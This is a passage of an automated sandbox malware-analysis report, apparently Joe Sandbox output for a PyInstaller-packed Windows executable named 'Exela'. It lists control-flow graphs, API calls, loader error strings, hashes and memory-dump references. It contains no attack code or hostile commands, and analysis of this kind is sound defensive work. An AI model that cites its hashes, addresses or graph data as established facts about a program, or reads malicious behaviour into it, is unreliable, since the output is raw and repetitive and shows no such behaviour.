                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                            • Opcode ID: 8a0f81467077cc4c225813434d72b9cad563560c0a92c7b3ae5d3c4c9c93026c
                                                                                                                                                                                                                                                            • Instruction ID: 6e586d02e4db0132939ad34954963a1907ced6fb1ffe9dd7a148fbc4b6c92d31
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a0f81467077cc4c225813434d72b9cad563560c0a92c7b3ae5d3c4c9c93026c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA518013B2924340FA14B72EA85B3BE6A525F84BC0F445035ED0FEB7C6ED2FE481464A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 930 7ff6e3a86bcc-7ff6e3a86c01 call 7ff6e3a862d8 call 7ff6e3a862e0 call 7ff6e3a86348 937 7ff6e3a86c07-7ff6e3a86c12 call 7ff6e3a862e8 930->937 938 7ff6e3a86d3f-7ff6e3a86dad call 7ff6e3a7b4a4 call 7ff6e3a821c8 930->938 937->938 943 7ff6e3a86c18-7ff6e3a86c23 call 7ff6e3a86318 937->943 950 7ff6e3a86dbb-7ff6e3a86dbe 938->950 951 7ff6e3a86daf-7ff6e3a86db6 938->951 943->938 949 7ff6e3a86c29-7ff6e3a86c4c call 7ff6e3a7b4ec GetTimeZoneInformation 943->949 963 7ff6e3a86d14-7ff6e3a86d3e call 7ff6e3a862d0 call 7ff6e3a862c0 call 7ff6e3a862c8 949->963 964 7ff6e3a86c52-7ff6e3a86c73 949->964 952 7ff6e3a86df5-7ff6e3a86e08 call 7ff6e3a7e19c 950->952 953 7ff6e3a86dc0 950->953 955 7ff6e3a86e4b-7ff6e3a86e4e 951->955 966 7ff6e3a86e0a 952->966 967 7ff6e3a86e13-7ff6e3a86e2e call 7ff6e3a821c8 952->967 957 7ff6e3a86dc3 953->957 956 7ff6e3a86e54-7ff6e3a86e5c call 7ff6e3a86950 955->956 955->957 961 7ff6e3a86dc8-7ff6e3a86df4 call 7ff6e3a7b4ec call 7ff6e3a6be00 956->961 957->961 962 7ff6e3a86dc3 call 7ff6e3a86bcc 957->962 962->961 970 7ff6e3a86c75-7ff6e3a86c7b 964->970 971 7ff6e3a86c7e-7ff6e3a86c85 964->971 976 7ff6e3a86e0c-7ff6e3a86e11 call 7ff6e3a7b4ec 966->976 989 7ff6e3a86e35-7ff6e3a86e47 call 7ff6e3a7b4ec 967->989 990 7ff6e3a86e30-7ff6e3a86e33 967->990 970->971 973 7ff6e3a86c99 971->973 974 7ff6e3a86c87-7ff6e3a86c8f 971->974 984 7ff6e3a86c9b-7ff6e3a86d0f call 7ff6e3a8b380 * 4 call 7ff6e3a837ac call 7ff6e3a86e64 * 2 973->984 974->973 979 7ff6e3a86c91-7ff6e3a86c97 974->979 976->953 979->984 984->963 989->955 990->976
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86BFA
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A86348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A8635C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86C0B
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A862E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A862FC
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86C1C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A86318: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A8632C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B502
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4EC: GetLastError.KERNEL32(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B50C
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E3A86E5C), ref: 00007FF6E3A86C43
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                                                                                                            • API String ID: 2248164782-690618308
                                                                                                                                                                                                                                                            • Opcode ID: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                                                                                                                                                                                                                            • Instruction ID: bc0427546af3e7dc5a526e453f99e79aef13e3ddda88c7017159427de4b521df
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9251A433B0868286F314DF29E4862B96B61FF48744F414135DB4DE7AA6DF3EE4908749
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                            • Opcode ID: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                                                                                                                                                                                                                            • Instruction ID: eb2b87b6b3fd2f372cb12a8e86889556a1e3642ec0efe4205a04ed3b76623c03
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF08163B2868186E7608F6CB48A76AB755BB44724F040239D66D526D4DF3DD0988B05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 7ff6e3a61700-7ff6e3a61714 1 7ff6e3a61716-7ff6e3a6172d call 7ff6e3a62b10 0->1 2 7ff6e3a6172e-7ff6e3a61732 0->2 3 7ff6e3a61758-7ff6e3a6177b call 7ff6e3a67c10 2->3 4 7ff6e3a61734-7ff6e3a6173d call 7ff6e3a612a0 2->4 13 7ff6e3a6177d-7ff6e3a617a8 call 7ff6e3a62870 3->13 14 7ff6e3a617a9-7ff6e3a617c4 call 7ff6e3a63fc0 3->14 11 7ff6e3a6174f-7ff6e3a61757 4->11 12 7ff6e3a6173f-7ff6e3a6174a call 7ff6e3a62b10 4->12 12->11 20 7ff6e3a617c6-7ff6e3a617d9 call 7ff6e3a62b10 14->20 21 7ff6e3a617de-7ff6e3a617f1 call 7ff6e3a70df4 14->21 26 7ff6e3a6191f-7ff6e3a61922 call 7ff6e3a7076c 20->26 27 7ff6e3a61813-7ff6e3a61817 21->27 28 7ff6e3a617f3-7ff6e3a6180e call 7ff6e3a62870 21->28 34 7ff6e3a61927-7ff6e3a6193e 26->34 31 7ff6e3a61819-7ff6e3a61825 call 7ff6e3a61050 27->31 32 7ff6e3a61831-7ff6e3a61851 call 7ff6e3a75570 27->32 37 7ff6e3a61917-7ff6e3a6191a call 7ff6e3a7076c 28->37 38 7ff6e3a6182a-7ff6e3a6182c 31->38 40 7ff6e3a61853-7ff6e3a6186d call 7ff6e3a62870 32->40 41 7ff6e3a61872-7ff6e3a61878 32->41 37->26 38->37 49 7ff6e3a6190d-7ff6e3a61912 40->49 44 7ff6e3a61905-7ff6e3a61908 call 7ff6e3a7555c 41->44 45 7ff6e3a6187e-7ff6e3a61887 41->45 44->49 48 7ff6e3a61890-7ff6e3a618b2 call 7ff6e3a70abc 45->48 52 7ff6e3a618e5-7ff6e3a618ec 48->52 53 7ff6e3a618b4-7ff6e3a618cc call 7ff6e3a711fc 48->53 49->37 55 7ff6e3a618f3-7ff6e3a618fb call 7ff6e3a62870 52->55 59 7ff6e3a618d5-7ff6e3a618e3 53->59 60 7ff6e3a618ce-7ff6e3a618d1 53->60 61 7ff6e3a61900 55->61 59->55 60->48 62 7ff6e3a618d3 60->62 61->44 62->61
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                                                            • Opcode ID: cc5ceb98eda4347158160fbccdf7b36260528fe1d69c774381dc3ea243bb172e
                                                                                                                                                                                                                                                            • Instruction ID: 7121ceb363d52737a635aa7b62582562a8ba7f5b705fbbd0265800e519491f54
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc5ceb98eda4347158160fbccdf7b36260528fe1d69c774381dc3ea243bb172e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A51D123F2868281EA109B2DE4463B97F91BF45BD4F400431DE0DE7A95DE3EE5C5870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 677216364-1384898525
                                                                                                                                                                                                                                                            • Opcode ID: bba1b85efbaa4b073b8c22ec037881b621827f3523ddc48d7032528aeb0d51b8
                                                                                                                                                                                                                                                            • Instruction ID: b370cd5ed77afb1e815dcf642836b5b31f51f116986d9447fe88bc36ac96f13a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bba1b85efbaa4b073b8c22ec037881b621827f3523ddc48d7032528aeb0d51b8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43517C73B1864286EB14DF2CE48627C7BA0EB48B44F518535D90DD7799DE2EE480CB4A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 266 7ff6e3a61000-7ff6e3a639b6 call 7ff6e3a70540 call 7ff6e3a70538 call 7ff6e3a687a0 call 7ff6e3a70538 call 7ff6e3a6bda0 call 7ff6e3a758d0 call 7ff6e3a764d8 call 7ff6e3a61ea0 284 7ff6e3a639bc-7ff6e3a639cc call 7ff6e3a63eb0 266->284 285 7ff6e3a63b5f 266->285 284->285 290 7ff6e3a639d2-7ff6e3a639e5 call 7ff6e3a63d80 284->290 287 7ff6e3a63b64-7ff6e3a63b84 call 7ff6e3a6be00 285->287 290->285 294 7ff6e3a639eb-7ff6e3a63a12 call 7ff6e3a67b60 290->294 297 7ff6e3a63a54-7ff6e3a63a7c call 7ff6e3a68040 call 7ff6e3a61ca0 294->297 298 7ff6e3a63a14-7ff6e3a63a23 call 7ff6e3a67b60 294->298 309 7ff6e3a63b2d-7ff6e3a63b3e 297->309 310 7ff6e3a63a82-7ff6e3a63a98 call 7ff6e3a61ca0 297->310 298->297 304 7ff6e3a63a25-7ff6e3a63a2b 298->304 305 7ff6e3a63a2d-7ff6e3a63a35 304->305 306 7ff6e3a63a37-7ff6e3a63a51 call 7ff6e3a7555c call 7ff6e3a68040 304->306 305->306 306->297 311 7ff6e3a63b92-7ff6e3a63b95 309->311 312 7ff6e3a63b40-7ff6e3a63b47 309->312 325 7ff6e3a63a9a-7ff6e3a63ab2 call 7ff6e3a62b10 310->325 326 7ff6e3a63ab7-7ff6e3a63aba 310->326 318 7ff6e3a63bab-7ff6e3a63bc3 call 7ff6e3a68bd0 311->318 319 7ff6e3a63b97-7ff6e3a63b9d 311->319 312->311 315 7ff6e3a63b49-7ff6e3a63b51 call 7ff6e3a68970 312->315 334 7ff6e3a63b53 315->334 335 7ff6e3a63b85-7ff6e3a63b88 call 7ff6e3a614e0 315->335 336 7ff6e3a63bc5-7ff6e3a63bcc 318->336 337 7ff6e3a63bce-7ff6e3a63bd5 SetDllDirectoryW 318->337 320 7ff6e3a63bdb-7ff6e3a63be8 call 7ff6e3a66de0 319->320 321 7ff6e3a63b9f-7ff6e3a63ba9 319->321 341 7ff6e3a63bea-7ff6e3a63bf7 call 7ff6e3a66a90 320->341 342 7ff6e3a63c33-7ff6e3a63c38 call 7ff6e3a66d60 320->342 321->318 321->320 325->285 326->309 327 7ff6e3a63abc-7ff6e3a63ad3 call 7ff6e3a63fc0 326->327 344 7ff6e3a63ada-7ff6e3a63b06 call 7ff6e3a682b0 327->344 345 7ff6e3a63ad5-7ff6e3a63ad8 327->345 340 7ff6e3a63b5a call 7ff6e3a62b10 334->340 349 7ff6e3a63b8d-7ff6e3a63b90 335->349 336->340 337->320 340->285 341->342 357 7ff6e3a63bf9-7ff6e3a63c08 call 7ff6e3a665f0 341->357 352 7ff6e3a63c3d-7ff6e3a63c40 342->352 344->309 359 7ff6e3a63b08-7ff6e3a63b10 call 7ff6e3a7076c 344->359 350 7ff6e3a63b15-7ff6e3a63b2b call 7ff6e3a62b10 345->350 349->285 349->311 350->285 355 7ff6e3a63ce6-7ff6e3a63cf5 call 7ff6e3a634a0 352->355 356 7ff6e3a63c46-7ff6e3a63c50 352->356 355->285 369 7ff6e3a63cfb-7ff6e3a63d54 call 7ff6e3a68940 call 7ff6e3a67fd0 call 7ff6e3a67b60 call 7ff6e3a63600 call 7ff6e3a68080 call 7ff6e3a66840 call 7ff6e3a66d60 355->369 360 7ff6e3a63c53-7ff6e3a63c5d 356->360 373 7ff6e3a63c0a-7ff6e3a63c16 call 7ff6e3a66570 357->373 374 7ff6e3a63c29-7ff6e3a63c2e call 7ff6e3a66840 357->374 359->350 366 7ff6e3a63c66-7ff6e3a63c68 360->366 367 7ff6e3a63c5f-7ff6e3a63c64 360->367 371 7ff6e3a63c6a-7ff6e3a63c8d call 7ff6e3a61ee0 366->371 372 7ff6e3a63cb1-7ff6e3a63ce1 call 7ff6e3a63600 call 7ff6e3a63440 call 7ff6e3a635f0 call 7ff6e3a66840 call 7ff6e3a66d60 366->372 367->360 367->366 409 7ff6e3a63d56-7ff6e3a63d5d call 7ff6e3a67d40 369->409 410 7ff6e3a63d62-7ff6e3a63d65 call 7ff6e3a61e70 369->410 371->285 384 7ff6e3a63c93-7ff6e3a63c9d 371->384 372->287 373->374 385 7ff6e3a63c18-7ff6e3a63c27 call 7ff6e3a66c30 373->385 374->342 388 7ff6e3a63ca0-7ff6e3a63caf 384->388 385->352 388->372 388->388 409->410 413 7ff6e3a63d6a-7ff6e3a63d6c 410->413 413->287
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A63EB0: GetModuleFileNameW.KERNEL32(?,00007FF6E3A639CA), ref: 00007FF6E3A63EE1
                                                                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF6E3A63BD5
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A67B60: GetEnvironmentVariableW.KERNEL32(00007FF6E3A639FF), ref: 00007FF6E3A67B9A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A67B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E3A67BB7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                            • API String ID: 2344891160-1544818733
                                                                                                                                                                                                                                                            • Opcode ID: 767da2809997ecd08a899f0714dab35352101c7708ff18cc608221b79fe6a14f
                                                                                                                                                                                                                                                            • Instruction ID: 67d214a280c7121991abedfe876a4301bf17e5ee3027b9695b144f8c5eab7561
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 767da2809997ecd08a899f0714dab35352101c7708ff18cc608221b79fe6a14f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60B1D753B3C68281FA24AB2D94533BD7B50BF40784F400135EA0DE72E6DF2EE586874A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                            • Opcode ID: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                                                                                                                                                                                                                            • Instruction ID: 8312a84c253ef4608bbe0eaed404640ba5e62b8947632b65e0080d1b55165f18
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72412232B087C182DA209B28E4863AAB7A4FF94364F500735E6AD977D9DF7DD0848B45
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 507 7ff6e3a61050-7ff6e3a610ab call 7ff6e3a6b630 510 7ff6e3a610ad-7ff6e3a610d2 call 7ff6e3a62b10 507->510 511 7ff6e3a610d3-7ff6e3a610eb call 7ff6e3a75570 507->511 516 7ff6e3a610ed-7ff6e3a61104 call 7ff6e3a62870 511->516 517 7ff6e3a61109-7ff6e3a61119 call 7ff6e3a75570 511->517 522 7ff6e3a61264-7ff6e3a61279 call 7ff6e3a6b310 call 7ff6e3a7555c * 2 516->522 523 7ff6e3a6111b-7ff6e3a61132 call 7ff6e3a62870 517->523 524 7ff6e3a61137-7ff6e3a61149 517->524 539 7ff6e3a6127e-7ff6e3a61298 522->539 523->522 526 7ff6e3a61150-7ff6e3a61175 call 7ff6e3a70abc 524->526 533 7ff6e3a6117b-7ff6e3a61185 call 7ff6e3a70830 526->533 534 7ff6e3a6125c 526->534 533->534 540 7ff6e3a6118b-7ff6e3a61197 533->540 534->522 541 7ff6e3a611a0-7ff6e3a611c8 call 7ff6e3a69a70 540->541 544 7ff6e3a611ca-7ff6e3a611cd 541->544 545 7ff6e3a61241-7ff6e3a61257 call 7ff6e3a62b10 541->545 546 7ff6e3a6123c 544->546 547 7ff6e3a611cf-7ff6e3a611d9 544->547 545->534 546->545 549 7ff6e3a611db-7ff6e3a611e8 call 7ff6e3a711fc 547->549 550 7ff6e3a61203-7ff6e3a61206 547->550 556 7ff6e3a611ed-7ff6e3a611f0 549->556 552 7ff6e3a61219-7ff6e3a6121e 550->552 553 7ff6e3a61208-7ff6e3a61216 call 7ff6e3a8ace0 550->553 552->541 555 7ff6e3a61220-7ff6e3a61223 552->555 553->552 558 7ff6e3a61237-7ff6e3a6123a 555->558 559 7ff6e3a61225-7ff6e3a61228 555->559 560 7ff6e3a611f2-7ff6e3a611fc call 7ff6e3a70830 556->560 561 7ff6e3a611fe-7ff6e3a61201 556->561 558->534 559->545 562 7ff6e3a6122a-7ff6e3a61232 559->562 560->552 560->561 561->545 562->526
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
